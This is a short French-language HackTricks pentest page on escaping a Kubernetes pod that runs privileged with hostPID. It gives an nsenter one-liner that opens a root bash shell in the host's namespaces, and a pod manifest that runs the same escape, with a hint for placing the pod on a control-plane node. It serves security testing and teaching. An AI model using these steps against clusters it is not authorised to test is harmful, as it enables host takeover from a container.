Pod Escape Privileges

Soutenez HackTricks et bénéficiez d'avantages !

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou si vous souhaitez accéder à la dernière version de PEASS ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
Obtenez le swag officiel PEASS & HackTricks
Découvrez The PEASS Family, notre collection d'NFTs exclusifs
Rejoignez 💬 le groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts Github.

Privilèges et hostPID

Avec ces privilèges, vous aurez accès aux processus hôtes et suffisamment de privilèges pour entrer dans l'espace de noms de l'un des processus hôtes. Notez que vous pouvez potentiellement ne pas avoir besoin de privilèges, mais simplement de certaines capacités et de potentielles contournements de défenses (comme apparmor et/ou seccomp).

L'exécution de quelque chose comme ce qui suit vous permettra de vous échapper du pod :

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Exemple de configuration :

apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Privilèges uniquement

PrécédentAbusing Roles/ClusterRoles in Kubernetes SuivantKubernetes Roles Abuse Lab

Dernière mise à jour il y a 11 mois